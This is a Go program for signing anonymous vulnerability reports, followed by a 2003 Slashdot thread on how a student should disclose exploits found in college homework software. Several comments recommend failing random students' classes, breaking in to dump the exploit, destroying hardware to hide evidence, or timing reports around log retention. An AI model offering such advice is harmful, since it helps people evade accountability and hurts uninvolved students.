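	if err != nil {
		return nil, err
	}
	return &Reporter{pub: pub, priv: priv}, nil
}

// SignedReport is what goes to the vendor: the text, the public key, and a
// signature binding the two. All three fields are safe to publish.
type SignedReport struct {
	Body      string
	PublicKey string // base64
	Signature string // base64, over Body
}

// Sign produces the report to submit anonymously.
func (r *Reporter) Sign(body string) SignedReport {
	return SignedReport{
		Body:      body,
		PublicKey: base64.StdEncoding.EncodeToString(r.pub),
		Signature: base64.StdEncoding.EncodeToString(ed25519.Sign(r.priv, []byte(body))),
	}
}

// Fingerprint is a short identifier for the key that can be quoted in the email.
func Fingerprint(publicKeyB64 string) string {
	sum := sha256.Sum256([]byte(publicKeyB64))
	return hex.EncodeToString(sum[:8])
}

func decodeKey(publicKeyB64 string) (ed25519.PublicKey, bool) {
	raw, err := base64.StdEncoding.DecodeString(publicKeyB64)
	if err != nil || len(raw) != ed25519.PublicKeySize {
		return nil, false
	}
	return ed25519.PublicKey(raw), true
}

// VerifyReport checks, at receipt or any later time, that Body was signed by
// the key the report carries. A modified body or key fails.
func VerifyReport(sr SignedReport) bool {
	pub, ok := decodeKey(sr.PublicKey)
	if !ok {
		return false
	}
	sig, err := base64.StdEncoding.DecodeString(sr.Signature)
	if err != nil {
		return false
	}
	return ed25519.Verify(pub, []byte(sr.Body), sig)
}

// Answer signs a challenge chosen by whoever wants proof of authorship.
func (r *Reporter) Answer(challenge []byte) []byte {
	return ed25519.Sign(r.priv, challenge)
}

// ProveAuthorship: if the answer verifies under the public key embedded in
// the original report, the claimant held the signing key at disclosure time.
func ProveAuthorship(sr SignedReport, challenge, answer []byte) bool {
	pub, ok := decodeKey(sr.PublicKey)
	return ok && ed25519.Verify(pub, challenge, answer)
}

func main() {
	rep, err := NewReporter()
	if err != nil {
		panic(err)
	}
	// Constructed report text; a real one would carry the vulnerability details.
	sr := rep.Sign("Vulnerability report: score submission accepts unvalidated input.")
	fmt.Println("key fingerprint:", Fingerprint(sr.PublicKey))
	fmt.Println("report verifies:", VerifyReport(sr))
	challenge := []byte("vendor challenge 2003-08-07")
	fmt.Println("authorship proven:", ProveAuthorship(sr, challenge, rep.Answer(challenge)))
}
```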
  • Leverage this to make Microsoft release a Linux client for the Xbox!
  • by JRHelgeson ( 576325 ) on Thursday August 07, 2003 @10:11PM (#6641573) Homepage Journal
    This is a debate that has been taking place in the security industry for some time now. Does Full Disclosure hurt or help the industry? I am of the position that full disclosure helps.

    If bugs are kept secret, the secrets get held in the hands of the few. The unethical hacker [cracker] will eventually exploit the code and use it to their advantage.

    If it weren't for FD, we'd have more 0day exploits because companies would not feel the pressure to release timely updates. It chews up development cycles to go back and put an emergency fix in place for insecure code, test it, and release it. Do you think companies would do this voluntarily? I think not. Too expensive. They'll include it with their next major update and charge for the upgrade or some crap like that.

    I say the medicine is bad, but the disease is worse. Full Disclosure is the Medicine, bad coding the disease.

    We are going to continue down this road of FD debate until software vendors (M$ et al.) start writing secure code. I have said it many times; Requiring patches to achieve security is fundamentally flawed. Coders need to write secure code. The onus is on them. Don't blame the hackers/crackers for airing their dirty laundry. If M$ or whoever loses market share because they consistently release insecure code that is repeatedly being compromised then that is their fault.

    It was only after being repeatedly beat over the head with the proverbial lead pipe by the hacker community that good ole Bill Gates sent out a memo stating that Security is becoming Microsoft's #1 priority. Do you really think he would have done that if we didn't have the Full Disclosure in place? We should not rely on 'security by obscurity' by keeping the exploits secret, or keeping the information reserved for the security elite.

    Send a confidential email to the network administrators and to the company that created the software. State that you will give them adequate time to respond and to release a patch. State that the exploit will undergo full disclosure in two months, or if they request extra time, ask them what measures are being taken to ensure the integrity of the information being stored on these computers. If you can hack into the system to raise your grades, others could hack in to lower the hard earned grades of others. Hell, at that point, they should start selling diplomas at the bookstore.

    • Your assessment of Microsoft's interest in security is not accurate. Full disclosure did not cause microsoft to give a damn about security. Security became important at MS when customers started saying "we care about security, your shit sucks, we're not buying it anymore". MS doesn't give a damn about a bunch of egotistical self-serving "researchers" that are looking to sell their name as a brand and shop around for consulting dollars. Security is a priority now at MS because customers have finally said
  • by donscarletti ( 569232 ) on Thursday August 07, 2003 @10:15PM (#6641596)
    Well personally I would have cracked into the program, using the exploit and dumped the exploit, and a file explaining it in a conspicuous location. That's sure to get their attention!
  • by WasteOfAmmo ( 526018 ) on Thursday August 07, 2003 @10:17PM (#6641610) Journal

    I can understand wanting to cover your backside with this. Especially since you have 'tested' the exploit. Going to the university may mean the end of your academic career. Going to the company may result in the same in a roundabout way. The company may feel obligated to report you to the said university.

    If you are serious about getting the exploit fixed then there are a lot of good points already made in the replies:

    • Send it to the company anonymously.
    • Send it to the university IT dept. anonymously.
    Do both and that should get it where you want it to go.

    Now for my take on this (if you were one of my students)...

    You are supplying the source of the proof of concepts, right? I accept no binaries from unknown source, especially with your story. You have to convince me that you are not only legit. but being honest. If you approach me you had better be able to prove that you have not altered your grades. This is not due to my morals but due to my obligations to the university.

    I have dealt with students bringing up exploits to me that they have found work in our system. First I have to verify their claim, second I have to consider the damage they may have done (purposefully or not). If this means a call to security then I am obligated to do that. After that I have to consider fixing my system and damage control.

    Note about security: I need not bring security into it but I must document everything in case the incident becomes a concern in the future... Example, next year you suddenly become an honor student.

    A comment by 'has' bothers me... if this is you then you could be in deeper than you want to be... I would suggest cleaning up your act, taking an ethics course and getting on with your degree. This type of unethical, and probably illegal (fraud?) activity will eventually catch up with you if continued. Enough preaching.

    Take the suggestions regarding anonymous submissions if you're serious about helping.

    Merlin.

  • A little late... (Score:4, Interesting)

    by JWhitlock ( 201845 ) <John-Whitlock&ieee,org> on Thursday August 07, 2003 @10:19PM (#6641621)
    I am a U.S. university student who has recently come across 2 remote exploits for a homework program used by colleges nationwide.

    Come across? Like you woke up one morning and found them in your mailbox, between credit card offers?

    Both vulnerabilities allow students to give themselves arbitrary scores, and possibly execute arbitrary code. To further emphasize the scope of this vulnerability, I have written and -selftested proof-of-concept exploit code.

    Now I'm thinking - did you have a legal copy of the software you were "testing"? If not, do you know the person/entity who has the legal copy? Did you get their permission to poke around?

    I would expect the litigation or academic discipline, if you pursued your experiment without a legal copy, or at least the permission of the person who owned the licensed copy. Or at least asked a professor to act as advisor for your experiments.

    As an ethical geek, what do -you- do?

    Ask permission from the target company before pursuing exploits.

    I may be reading too much into the poster's brief notes (or maybe the poster's name), but I have a feeling that there are several illegal (and possibly unethical) things that have been done so far. The best way to avoid a situation like this is to plan to be ethical, legal, and open from the beginning. Get the company's permission, the school's permission, etc., and no one will be surprised when you get some results. Otherwise, they may say "Thank you, now please come to court in two weeks", and you have little recourse except to hire a lawyer.

    Which the poster should probably do, anyway. It's a shame - with the proper authorization, this could have been an interesting senior project.

  • by Goonie ( 8651 ) * <robert.merkel@b[ ... g ['ena' in gap]> on Thursday August 07, 2003 @10:30PM (#6641682) Homepage
    I am a postgraduate student (hopefully) not that far away from finishing. I have been a casual tutor for years at two different universities; I am also on the board of a university-affiliated institution (an "academic college"). I've been involved in some very nasty catfights, so I've been around the block.

    If you decide to pursue the route of getting something done about it, I'd suggest:

    • don't even discuss the idea of a quid pro quo, be it monetary or academic. It makes you sound like you're trying to blackmail your university or the companies involved. Unless that's what you want to do, of course...in which case I hope you enjoy a short and unsuccessful career as a criminal.
    • Get somebody with muscle and who understands the situation on your side. A tenured academic who understands the technology and the geek ethic is ideal. If you don't know them directly, maybe a TA or another more advanced student that you do know directly will.
    • They may want it solved on the quiet. Will you be prepared to accept that, or do you want glory?
    • If it doesn't get solved, then you might consider taking it to the student paper. All journalists love a juicy story, and most student papers (if they've got enough editorial independence) love sticking it to the uni admins, so they are a good option. If that's not an option, there is the local media, but if it goes that far you really want help - you can never be sure which way a journo is going to spin a story, particularly one like this, and a professor sounds a whole lot more credible on TV than a scruffy college student. I know that's not fair, but that's the way it works.
  • by dallask ( 320655 ) <codeninja AT gmail DOT com> on Thursday August 07, 2003 @10:33PM (#6641700) Homepage
    Today I ran across 2-3 holes (cross site scripting with remote execution, sql injection with code exposure, and account hijacking) in the blackboard system which I am currently working to exploit... for a proof of concept. If this is the same system you're talking about, I want to talk with you. Maybe with enough ammunition they will listen to the both of us more than they would listen to one.

    email me.
  • by Tracy Reed ( 3563 ) <treed AT ultraviolet DOT org> on Thursday August 07, 2003 @10:37PM (#6641719) Homepage
    Freenet Project [freenetproject.org]

    And then give yourself an A. :)
  • by Fantastic Lad ( 198284 ) on Thursday August 07, 2003 @10:42PM (#6641744)
    There has been a history of people being punished for doing the right thing.

    Yes, this is insane, but it's also how it is.

    --True, if you take the right approach, have the right kind of charisma, (ie, express honesty and even explain your concerns up front about how other people before you being punished for having done the right thing in the past,) you might be able to pull it off. I wouldn't count on it though. The sheep behind the glass are getting colder every day, and even a smooth talker like me has been really having to sweat in order to earn my best intentions. It's getting tough out there.

    So in this instance, and others like it, I wouldn't bother.

    And just to be clear, I wouldn't use the exploit either. --Chances are, if you do, you'll really end up in hot water. Indeed, I strongly suspect that some cases of these kinds of exploits are designed to discover those who are not sheep-like enough so that they can be flagged for later. . , uh, disposal. (Same goes for things like performing acts of guerrilla advertising, and ad-defacement of particularly nasty posters and billboards around your town. That sort of thing is monitored.)

    --Which, of course, means that if you try in earnest to bring the hole in the code to the attention of the 'masters of the universe', then somebody, somewhere will be all pissed off with you for ruining their entrapment scheme.

    My advice? Sit tight. --The furthest you might want to go is to discuss it openly to anybody who cares to listen, saying you heard about it on the net from some anonymous coward. Wide open honesty is usually the best way to screw evil plans without bringing down reprisal and brimstone on your head. Works for me.


    -FL

  • DO NOTHING (Score:5, Insightful)

    by YetAnotherName ( 168064 ) on Thursday August 07, 2003 @11:01PM (#6641843) Homepage
    With the current political climate, your best bet is to do absolutely nothing. People are arrested for expressing opinions, others are denied due process for free speech, and still others are deemed terrorists for even the slightest questioning of a government's actions. Corporations mandate what can and cannot be done and are happily funded by a more sheepish and numbed people, armed with a more sheepish and willing set of so-called representatives.

    Do nothing. Sure, you can pat yourself on the back for your ingenuity, but file your discoveries away in your mind. The world cannot tolerate them now.

    Sad. But true.
  • Serious Suggestion (Score:3, Interesting)

    by Zork the Almighty ( 599344 ) on Thursday August 07, 2003 @11:23PM (#6641951) Journal
    This is a serious suggestion. Don't report it, just pick classes at random each semester and fail all the students in them. 10 or so should be enough. The administration will freak out, and they will get the company's attention for you. Use an anonymous remailer to tell the company where the problem is, but never release any exploit code.

    The fact is, with this sort of thing, the squeaky wheel gets whacked with a sack of doorknobs.
  • by The Revolutionary ( 694752 ) on Thursday August 07, 2003 @11:54PM (#6642131) Homepage Journal
    If you have done what I think you have, then you are quite probably screwed no matter what course of action you choose.

    If you do report the problem, the IT administrators will be obliged to perform a damage assessment. They will scan their logs for behavior possibly taking advantage of this exploit. That you say you have proof of concept code, and presumably have tested it, if IT discovers that you have so much as tried to take advantage of this or a related exploit, it will almost certainly result in your dismissal for that Semester, criminal charges, and possibly the end of your academic career.

    It won't help to go through a professor. If IT comes back and says that they have evidence that you tried to take advantage of the exploit (by 'testing'), you will not be spared, and the professor will either be unwilling or unable to protect you.

    If you do not report the problem, you risk IT discovering the exploit on their own or through a security update from the vendor, and similarly performing damage assessment to discover whether or not their systems or data have been compromised, or attempted to have been compromised.

    Don't scoff at this. If it is a significant exploit, and given that there is now a story on Slashdot about it, there is a significant possibility that IT will perform a damage assessment.

    Further, depending upon how you found or 'tested' this exploit, IT may find you out whether or not they realize or are alerted to the nature of the exploit.

    It is really up to you. Only you know the nature of your investigative activities and testing. If discovering these exploits required behavior which went beyond the normal use of the system, then you have a very serious problem.

    How do you explain why you were doing this in the first place? You can't, and quite honestly, there is almost certainly no excuse for it. If you were concerned about the security of the system, you should have gone through official channels to get clearance to look for vulnerabilities, and report the sort of investigative techniques you would be using, and do only this.

    If you have not done this, then you have one course of action:
    - Find out how long of a period IT keeps logs for. If you are a technically inclined student, then surely you have acquaintances -- students -- who work in IT.
    - If the logs of your activity are gone, then you are in the clear. Report the vulnerability anonymously the next time you are off campus. Unfortunately, from the few academic IT departments I am familiar with, they keep logs for a very long time, because of issues just like these.
    - If, on the other hand, the logs of your activity are not gone, then weigh the possibility of your activity being found out before the logs will be cycled or destroyed.

    If the logs will be around for months still, then you are quite possibly in serious trouble. If the logs will be around for a year or more, then you are almost certainly in very serious trouble.

    If you report your activities, then you are almost certainly in very serious trouble.

    Personally, I would go with the first option, and hope that your IT department will not perform damage assessment, or that they will not find out about the exploit until next semester, and will not be interested in logs from the previous semester, or perhaps from the previous academic year.
  • by gte910h ( 239582 ) on Friday August 08, 2003 @12:18AM (#6642251) Homepage
    You don't report this. Simply you don't. You are too vulnerable.

    After you graduate, if you want to report it, send hard copy source listings to admins of the system at the college, the company that runs the software, and several professors in the technical areas of your college. You then forget this and don't ever think of it again.

    Destroy the computer, the hard drive the printout you had was created on. This is so you cannot be determined to have cheated at your degree if you ever DID get "located".

    I suggest wiping it with the software that PGP comes with then taking a road trip to celebrate graduation to a couple states away. If you're in California, visit Iowa. If you're in New York, I would have to say GA is nice in May. Leave it in a dumpster somewhere mixed in with nothing else of yours.

    I think in 10 years there will be a system of computer ethics, or a government board that you can report this stuff to with a condition of amnesty. It's all too new to too many people for that to work right now, so you just have to practice silence.
  • by augustz ( 18082 ) on Friday August 08, 2003 @12:21AM (#6642270)
    Stay anonymous. Do the COST-BENEFIT analysis (seriously).

    In this climate, you have everything to lose and very VERY LITTLE to gain no matter how cool you think it is.

    The school must follow no laws but its own and can expel you, and I PROMISE you that somewhere somehow you violated their AUP or TOS.

    The vendor can sue you, and even if you beat them you are stuck with a HUGE legal bill.

    You can get some overzealous local DA trying to move up the ladder to take you on. If you don't have a lot of money you are a tempting target for obvious reasons.

    You need to understand the DMCA (and companies who file suit under it) claiming that attempts at circumvention are illegal.

    And what would you gain? I think you'd be surprised at how very little unless you want to work for a security company, and even then that is tough. Folks with hacking pasts are often radioactive in the IT world, and with big companies especially so. You'll have a very hard time getting a background clearance.

    I'd notify the vendor and some lists 100% anonymously (and not just spoofing an email). If they don't act in the reasonable time frame, full disclosure, and it will be sure to get fixed. You've done your part, with none of the baggage.

    You need to think through how limited the upside is. College kids love the challenge, and want to feel proud for doing the right thing. Commercial companies hate to be embarrassed, and will sic their lawyers on you if given half a chance.

    Blackboard already went down this route I think with some kid they sued to convince him that he hadn't found a vulnerability. Much of the business world does not particularly care about right and wrong, what they do care about is $$ and lawyers.

    College is wonderful, don't let it fool you.

    And frankly, given that the industry has forced through so many ridiculous laws (UCITA anyone?), give them a fair 30 days but then go full-disclosure. What goes around comes around.
    • Stay anonymous. Do the COST-BENEFIT analysis (seriously).
      In this climate, you have everything to lose and very VERY LITTLE to gain no matter how cool you think it is.

      I agree with Augustz's post 100%. Use a public library (not the school's library, but the public library) to send an email from a free email service, and make sure the service is not in the US.

      Read about how Blackboard treated two students here [com.com] and see if you think reporting the problem is safe or not. In view of BlackBoard's past action

  • Contact Me (Score:5, Informative)

    by jsnider ( 194261 ) * on Friday August 08, 2003 @01:38AM (#6642603)
    I'm making the assumption that the software you found a problem in is Blackboard. I apologize if that is not the case, however, I would still be happy to take your discovery to the vendors of whatever software it is on your behalf.

    I work for a major university as the Blackboard programmer/administrator. I've been working on the Blackboard code for years, making substantial modifications to the Bb system to suit our university. I've found my share of bugs, problems, and more than one gaping hole. Blackboard is riddled with XSS, input validation, SQL insertion, replay, predictable sequences, and I'm sure countless other vulnerabilities. Quite frankly I'm amazed at how few breaches I hear about.

    I think you're right to be careful, but try to not get carried away. At least in our department, we're eager to hear about problems and fix them. We're not interested in ruining someone's college education. However, you should be careful about who you contact. At our university, the usual IT people are paranoid. You need to get as close to the people who deal with Bb as you possibly can. Contacting a suit in upper IT would likely get you the slapdown. Start lower. You're looking for the geeky programmer who deals with Bb all day long and would drop everything they are doing to fix a hole in their system.

    If you are not comfortable contacting representatives at your university, feel free to contact me about your discovery. This sort of stuff is what I do, and besides, I'm already on Blackboard's shit list. I have another issue to report to Bb, (the aforementioned gaping hole) and I'd be happy to send your information along with it, with or without your name. jeff (somewhere near) jsnider.net
  • It happened to me (Score:3, Interesting)

    by mcrbids ( 148650 ) on Friday August 08, 2003 @03:40AM (#6642993) Journal
    Well, mostly.

    I was working on a site for a client, and discovered a vulnerability that was easily exploitable in a Credit Card interface for a large, well-known company.

    I sent details of the exploit, complete with working code samples to the company in a carefully written, detailed, email.

    About 2 weeks later, I got a phone call from a *very* agitated man who kept saying over and over: "it's not really a problem". I simply listened; I had nothing to say since it'd already been said. I didn't say anything, and he eventually hung up on one of the weirdest phone calls I've ever had.

    The vulnerability allows me to buy anything I want from any client site of said large, well-known company.

    So, speak your piece. Send the details to the company/vendor, along with full details, exploit code, everything you know. Make it clear that you are not going to publish it, or at least make clear the conditions that would make you feel it necessary to publish, and put the onus on them.

    I did, and I have a clear conscience.
  • Law School. (Score:3, Insightful)

    by Irvu ( 248207 ) on Friday August 08, 2003 @10:13AM (#6644527)
    If your College/University has a law school then you might be able to look there for advice. If the university has such a school then it is possible that they may have one or two professors who can advise you in this matter. Unlike the School's Legal staff they are not bound to protect the school in the same way.

    I would still be wary when approaching them, you don't want one of them to cause trouble any more than any other. But it might be a good direction to turn.
  • by wbav ( 223901 ) <Guardian.Bob+Slashdot@gmail.com> on Friday August 08, 2003 @10:41AM (#6644766) Homepage Journal
    Okay, so two stories, one from Jr. High, one from high school.


    In Jr. High, someone was giving out the admin password past FoolProof (a mac protection software that was incredibly simple to bypass at the time.) Anyways, I tried to inform the IT guy, and he blew me off, saying that I didn't really know the password. So I put on a little app that made the computer belch.

    Someone snitched, and I ended up in the principal's office. I tried to plead my case, it wasn't like I hadn't tried to do the right thing, and when they wouldn't listen I gave them something they couldn't ignore. Detention 4 weeks.


    I should have learned from my first experience but I didn't. In high school, the network was completely insecure. You could print to any class room across the whole school district, and everything was named quite nicely. Once again, I was blown off when I tried to say this was a bad thing.

    Not only were all the printers there, but a number of computers were open with read access to everything. So I opened a network connection to every shared disk along the network and started a find for everything. The IT guy in the lab looked over my shoulder and asked what I was doing. Detention again, this time for "Slowing the hard drives down."

    If only more people got into trouble for changing the laws of physics.
